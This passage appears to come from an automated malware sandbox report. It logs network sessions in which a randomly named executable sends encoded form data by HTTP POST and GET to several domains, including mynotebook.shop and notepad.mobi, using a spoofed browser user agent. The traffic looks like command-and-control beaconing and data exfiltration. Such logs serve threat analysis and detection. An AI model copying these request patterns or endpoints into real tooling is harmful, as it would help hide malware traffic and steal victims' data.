                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              Origin: http://www.parkerstraus.dev
                                                                                                              Referer: http://www.parkerstraus.dev/ppmq/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 48 54 39 75 74 66 31 2b 45 79 71 67 6f 65 79 75 6a 38 58 72 59 78 62 4c 70 42 78 68 62 45 31 72 39 47 71 76 71 52 78 4c 4c 4b 41 62 57 44 75 64 76 4b 4c 37 6c 41 38 50 43 68 78 71 76 30 65 79 39 34 65 38 2b 48 48 57 4b 47 71 39 42 6d 4c 39 30 67 45 30 44 4c 4b 46 34 6b 6b 32 43 6b 79 4d 58 62 49 33 36 34 62 43 48 38 6e 36 65 35 49 5a 69 2b 32 6d 73 2b 57 66 70 35 52 38 63 6b 6d 72 6a 62 2f 4b 31 56 6a 75 4a 45 35 59 66 33 50 52 44 32 38 78 46 46 46 54 61 30 53 39 57 51 37 50 64 61 34 54 78 52 31 69 5a 57 4e 4d 75 7a 6a 4c 55 6e 6c 39 67 48 66 38 5a 68 52 76 32 4a 31 42 4a 6f 69 6d 38 30 33 2f 44 61 67 79 4d 33 37 68 43 77 51 69 6f 65 36 31 59 30 64 34 50 66 35 78 32 77 72 31 33 62 4c 36 77 43 75 56 32 37 58 6b 54 38 34 36 6d 7a 4c 2b 6c 70 48 61 52 39 46 61 38 67 4b 2b 44 52 47 5a 66 4a 6e 48 69 63 33 44 79 2b 78 73 36 6d 6e 69 32 6f 54 64 6b 30 68 51 35 47 70 46 45 4c 31 6e 68 44 4d 38 78 39 6f 79 6c 31 58 2f 71 4b 58 72 6c 76 2f 56 33 70 62 66 71 70 68 44 5a 41 6b 77 7a 42 6d 33 4d [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=HT9utf1+Eyqgoeyuj8XrYxbLpBxhbE1r9GqvqRxLLKAbWDudvKL7lA8PChxqv0ey94e8+HHWKGq9BmL90gE0DLKF4kk2CkyMXbI364bCH8n6e5IZi+2ms+Wfp5R8ckmrjb/K1VjuJE5Yf3PRD28xFFFTa0S9WQ7Pda4TxR1iZWNMuzjLUnl9gHf8ZhRv2J1BJoim803/DagyM37hCwQioe61Y0d4Pf5x2wr13bL6wCuV27XkT846mzL+lpHaR9Fa8gK+DRGZfJnHic3Dy+xs6mni2oTdk0hQ5GpFEL1nhDM8x9oyl1X/qKXrlv/V3pbfqphDZAkwzBm3MViVyYNmPFv83ST0w1rmbGPkGciuDH2TvGh9nRL4oLzBvQL1QrormZzYj14uV80FUn1Z4MYAEJ5npgHZIek6XXr1//XUyRyPWvbQ6rDNfguSvGJydhkPdECzqikHTU57x6NAtQeBjmoEbrPwicU7PHntQ3sQG03hpo6opnDA8pv1b7m35LnTCCCn8sfaRgkHUzYB0XVS/2RCe4EUQ6HAdGUFRhUM1/6jZ9l1j/hM3Jirj+92dfaDAJDmAJfNjiF+G4RwvkIqhp6tGEydi4iO+yMxOt+iYF0HzgOS9RBLjVRURzXmMTitw09DJwMJviwYxRRRb6Aq98+Xg60BesWD9DGFIESh8mi+EiqB7c7dOhH1CJUW2/3nsU4VkvK1IobgDd/CmPqkS0D+L1H7CnxBJummaQmYluV8vwl6bxPbbSt5EvDbyeI5pcPYBoyJolgQvATQ3HGE6a9tucwfYxdRg3Udizta8LoU8RZowNHf00Y5WRJdFK6QSJlUgyOdyK99lnGjbVpecV0hjKB70cf4cPXwzzlg0V//wb7eGqkwJTU9inlBLsJ6fChYQP1Z4u1PJrpOYFymDHIemD+1IlaJr7IVCkEc93cQz579QddxcEUPfGBawP+NANmjy+1v5frcNFj3N2wvKfE18xRx+vOEYgWIBT9MrKvZWhY [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:14.921844006 CET5424OUTData Raw: 4e 78 72 69 51 79 34 46 6a 36 33 4e 59 2f 30 47 77 50 53 55 4a 62 77 4f 6c 57 77 4a 66 55 70 38 59 57 54 64 6f 7a 50 30 4e 68 32 79 50 36 37 48 47 2f 47 46 78 31 53 30 63 34 57 76 2f 75 68 78 4b 53 66 72 34 32 7a 2b 68 2b 35 56 5a 66 4a 71 61 72
                                                                                                              Data Ascii: NxriQy4Fj63NY/0GwPSUJbwOlWwJfUp8YWTdozP0Nh2yP67HG/GFx1S0c4Wv/uhxKSfr42z+h+5VZfJqarneZhvRf6vmA0rZvi22CKW3OJX9EvM/JYHc8Io+fHBtNmnbor2Vb7kB6THQkz08HjbW9yXW66ghMbp3vXrfT3h6gmtNN8JH92xRUOsIgRcd1P7ud/kqXHtMZ29dOhgIRQiM2hTcUjBNEj4MmqHEXNe8diJzJM1EKaW
                                                                                                              Nov 5, 2024 15:36:15.055460930 CET1240INHTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:15 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC2ER0S7X9JQPQV0N533C2
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                                                              Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:15.055473089 CET1240INData Raw: 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b 6d 61 72 67
                                                                                                              Data Ascii: fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-
                                                                                                              Nov 5, 2024 15:36:15.055484056 CET504INData Raw: 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 3e 0a 66
                                                                                                              Data Ascii: urce=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JBYC2ER0S7X9JQPQV0N533C2</c


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              36192.168.11.204977750.19.214.227804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:17.560540915 CET460OUTGET /ppmq/?uXP=1HX8&Q2_4=KRVOuqNXYxyDgODQvejwfHP1kSw7YgglxTu2jlorf4EUTkuZz6rgp0sXDkV2rkGK77WHny3VDG/xcSWz2Ew3DtXH4m1AMWH2WLdk5ansbP7qCtZCj8eJzNQ= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:17.668472052 CET1240INHTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:17 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC2HAE3FKS9CP1QGCY05CR
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                                                              Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:17.668488026 CET1240INData Raw: 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b 6d 61 72 67
                                                                                                              Data Ascii: fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-
                                                                                                              Nov 5, 2024 15:36:17.668581009 CET504INData Raw: 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 3e 0a 66
                                                                                                              Data Ascii: urce=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JBYC2HAE3FKS9CP1QGCY05CR</c


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              37192.168.11.204977813.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:22.908857107 CET732OUTPOST /sws3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.mynotebook.shop
                                                                                                              Origin: http://www.mynotebook.shop
                                                                                                              Referer: http://www.mynotebook.shop/sws3/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 71 58 51 72 6b 65 61 75 75 54 46 64 49 47 58 2b 51 37 61 31 72 4c 65 30 6a 53 57 51 39 78 69 51 62 30 66 33 77 6d 48 73 56 75 70 73 37 6f 70 49 69 78 4c 4e 46 7a 69 6e 50 66 74 48 70 36 59 7a 69 2f 64 53 75 4b 4e 48 78 76 6c 45 38 6d 36 65 6d 6d 67 61 47 4e 4b 42 43 71 74 6c 58 62 64 50 52 39 78 53 37 46 7a 51 59 6c 48 46 6e 39 70 7a 6f 38 2b 4f 63 66 32 35 37 49 6d 39 6e 68 4c 55 50 4c 72 2f 56 64 42 7a 33 4a 43 59 76 63 49 4e 58 71 2b 53 4b 78 41 79 54 48 47 68 2f 52 52 49 4a 4b 2b 77 70 53 52 47 6b 58 52 2b 33 66 64 56 76 38 70 68 4f 49 48 6c 71 31 6c 33 6e 7a 65 74 72 51 3d 3d
                                                                                                              Data Ascii: Q2_4=qXQrkeauuTFdIGX+Q7a1rLe0jSWQ9xiQb0f3wmHsVups7opIixLNFzinPftHp6Yzi/dSuKNHxvlE8m6emmgaGNKBCqtlXbdPR9xS7FzQYlHFn9pzo8+Ocf257Im9nhLUPLr/VdBz3JCYvcINXq+SKxAyTHGh/RRIJK+wpSRGkXR+3fdVv8phOIHlq1l3nzetrQ==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              38192.168.11.204977913.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:25.545689106 CET752OUTPOST /sws3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.mynotebook.shop
                                                                                                              Origin: http://www.mynotebook.shop
                                                                                                              Referer: http://www.mynotebook.shop/sws3/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 71 58 51 72 6b 65 61 75 75 54 46 64 49 6d 48 2b 57 63 4f 31 67 4c 65 7a 6d 53 57 51 30 52 69 63 62 30 44 33 77 6e 7a 38 56 63 64 73 36 4e 46 49 73 51 4c 4e 4a 54 69 6e 45 2f 74 43 6b 61 59 73 69 2f 52 30 75 50 31 48 78 76 5a 45 38 6e 71 65 6c 58 67 56 47 64 4b 44 4f 4b 74 6a 54 62 64 50 52 39 78 53 37 45 44 75 59 6a 76 46 6e 4f 68 7a 70 64 2b 4a 52 2f 32 36 74 59 6d 39 74 78 4c 51 50 4c 72 64 56 63 63 6b 33 4c 4b 59 76 65 51 4e 57 37 2b 54 44 78 41 30 5a 6e 48 79 78 42 4d 69 49 6f 71 68 67 67 41 55 6a 32 56 45 79 4a 4d 50 79 4f 64 46 4e 62 62 58 75 46 63 66 6c 78 66 32 32 59 54 59 72 7a 77 6c 59 44 7a 57 46 71 36 74 34 63 73 73 42 46 49 3d
                                                                                                              Data Ascii: Q2_4=qXQrkeauuTFdImH+WcO1gLezmSWQ0Ricb0D3wnz8Vcds6NFIsQLNJTinE/tCkaYsi/R0uP1HxvZE8nqelXgVGdKDOKtjTbdPR9xS7EDuYjvFnOhzpd+JR/26tYm9txLQPLrdVcck3LKYveQNW7+TDxA0ZnHyxBMiIoqhggAUj2VEyJMPyOdFNbbXuFcflxf22YTYrzwlYDzWFq6t4cssBFI=


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              39192.168.11.204978013.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:28.186302900 CET2578OUTPOST /sws3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.mynotebook.shop
                                                                                                              Origin: http://www.mynotebook.shop
                                                                                                              Referer: http://www.mynotebook.shop/sws3/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 71 58 51 72 6b 65 61 75 75 54 46 64 49 6d 48 2b 57 63 4f 31 67 4c 65 7a 6d 53 57 51 30 52 69 63 62 30 44 33 77 6e 7a 38 56 63 46 73 37 37 52 49 6a 54 54 4e 48 7a 69 6e 4c 76 74 44 6b 61 59 68 69 2f 4a 6f 75 50 78 39 78 70 56 45 38 41 71 65 6b 6a 4d 56 56 39 4b 44 52 36 74 69 58 62 63 58 52 39 68 6f 37 45 7a 75 59 6a 76 46 6e 4a 52 7a 71 4d 2b 4a 43 76 32 35 37 49 6d 78 6e 68 4c 73 50 4b 4f 71 56 63 5a 5a 33 66 47 59 76 2b 41 4e 56 4a 6d 54 66 68 41 32 65 6e 47 31 78 42 41 35 49 75 4f 44 67 68 6c 50 6a 31 46 45 7a 6f 68 47 75 63 68 4f 5a 49 58 6d 76 48 4e 67 73 42 33 49 6f 34 72 62 71 79 51 4f 51 32 2f 6c 62 34 43 46 6a 74 4d 2f 43 77 4c 57 49 72 52 2b 47 49 6b 39 73 77 73 62 70 78 5a 79 4c 58 50 72 41 78 4d 47 35 59 39 54 73 46 37 4d 41 42 35 57 45 76 6f 70 76 70 4e 7a 36 5a 71 49 52 30 64 53 4f 6a 4c 6e 65 47 78 41 53 56 55 35 50 6e 6a 4b 79 42 48 68 76 69 67 68 6a 68 43 6c 62 42 67 59 72 78 34 31 59 39 2f 4a 61 34 78 35 48 61 79 38 62 74 6d 51 59 4a 6c 49 63 58 31 6c 70 4b 6f 61 64 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=qXQrkeauuTFdImH+WcO1gLezmSWQ0Ricb0D3wnz8VcFs77RIjTTNHzinLvtDkaYhi/JouPx9xpVE8AqekjMVV9KDR6tiXbcXR9ho7EzuYjvFnJRzqM+JCv257ImxnhLsPKOqVcZZ3fGYv+ANVJmTfhA2enG1xBA5IuODghlPj1FEzohGuchOZIXmvHNgsB3Io4rbqyQOQ2/lb4CFjtM/CwLWIrR+GIk9swsbpxZyLXPrAxMG5Y9TsF7MAB5WEvopvpNz6ZqIR0dSOjLneGxASVU5PnjKyBHhvighjhClbBgYrx41Y9/Ja4x5Hay8btmQYJlIcX1lpKoad1kXP57Wzlzt8/TYOLfL/jf+n3EuxpBT7/vmM5tA+sZLnmRiAM1IcMN6uTEXwYt9odugfvtqPMUdWtcXUUz7Bce912FTF2/OCcl4fZn9dy5j7OFm/FHxFW2jxDxWQKJ3zHGtS2jY4qWO/3Y+sFDryeqCqVl4HP94SdiPk/XCMVErGM9gs0LNWft9BE+bnTPcj/pxLKPNrc/JA+QCx0LqPhGkjNfxIZ+JDDLCRnLJZBqfiD95hNVBx8kRbmdG+Md6CJK6w7vODDsver9q2XwlsJWhtsgr1D6NEMYlCaCsNHojbrlC6/08QgpGUYnUOluW7FRPeoz31rgin7xT7oEmnA5P/6S+UbdAFSC170NUKLRzgQOmXtGUC9nf8ueMRhwF3k3PxeMvirJ4RCLrxFcw8mY5Z69JQni2D+Ho9cbPbPrG9GDrRf2lrVlV1gLMjq0+Kgoq9aagI7bqfjFzh34InKcGooIbobax6e5A5mwnue5VVXNBVFgluKMKFEkgb7Ud37yPD6xlk+etlk97qhzBh0iNk7so/08QrVnSKHJ+LjhKAqh14CtMpRoXmDz+dkO5Hs0Z62qXhaLYisL5kaRuHzvrv/0H1I3wsQ9ClrzCQUuYdRdfX5lzXjziOBxxHmum4C8XkGGhLFFPgXYMvv5ugYs4NbXXNqoPT+Z [TRUNCATED]
                                                                                                              Nov 5, 2024 15:36:28.186389923 CET5323OUTData Raw: 41 4c 4d 5a 73 72 33 38 70 36 7a 62 67 67 68 6d 44 62 58 39 36 6f 30 77 59 45 6c 48 39 73 31 53 48 4d 59 48 59 5a 4f 32 34 65 6d 70 65 31 75 73 79 49 45 44 76 56 67 67 39 51 5a 50 32 69 4f 6c 2b 56 6f 45 30 62 31 45 75 78 6b 70 41 6e 6e 6a 31 76
                                                                                                              Data Ascii: ALMZsr38p6zbgghmDbX96o0wYElH9s1SHMYHYZO24empe1usyIEDvVgg9QZP2iOl+VoE0b1EuxkpAnnj1v2dFilVZtbotQPtLXrHnGDCa1Ud96PKLJ6xkFJQVUlX7kYGV9zhya/Nl+H5rMnhcD2kGHWB9VVHntl5/ti16dg9Me1WhBpZzt++36RI3xtS6jnue/oGhgurl0HuMWw0WvXrGcLfTApJatZKSY3nu/c/GpnoMCxLDpZ


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              40192.168.11.204978113.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:30.833393097 CET459OUTGET /sws3/?Q2_4=nV4LnquDqwBlA07HQ+G/v4eHjjrt+T2QZG3593DoQvpPwtJ1qSvdLT+tAqFoiYkQqMds5fxc5qEgqBHWhT8GH/u4GJVId9VOA+wH6Rzyb1bp8I1+ufyyCcg=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.mynotebook.shop
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:30.944552898 CET389INHTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:36:30 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 32 5f 34 3d 6e 56 34 4c 6e 71 75 44 71 77 42 6c 41 30 37 48 51 2b 47 2f 76 34 65 48 6a 6a 72 74 2b 54 32 51 5a 47 33 35 39 33 44 6f 51 76 70 50 77 74 4a 31 71 53 76 64 4c 54 2b 74 41 71 46 6f 69 59 6b 51 71 4d 64 73 35 66 78 63 35 71 45 67 71 42 48 57 68 54 38 47 48 2f 75 34 47 4a 56 49 64 39 56 4f 41 2b 77 48 36 52 7a 79 62 31 62 70 38 49 31 2b 75 66 79 79 43 63 67 3d 26 75 58 50 3d 31 48 58 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=nV4LnquDqwBlA07HQ+G/v4eHjjrt+T2QZG3593DoQvpPwtJ1qSvdLT+tAqFoiYkQqMds5fxc5qEgqBHWhT8GH/u4GJVId9VOA+wH6Rzyb1bp8I1+ufyyCcg=&uXP=1HX8"}</script></head></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              41192.168.11.204978213.248.169.48804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:36:44.367878914 CET723OUTPOST /zut6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.notepad.mobi
                                                                                                              Origin: http://www.notepad.mobi
                                                                                                              Referer: http://www.notepad.mobi/zut6/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
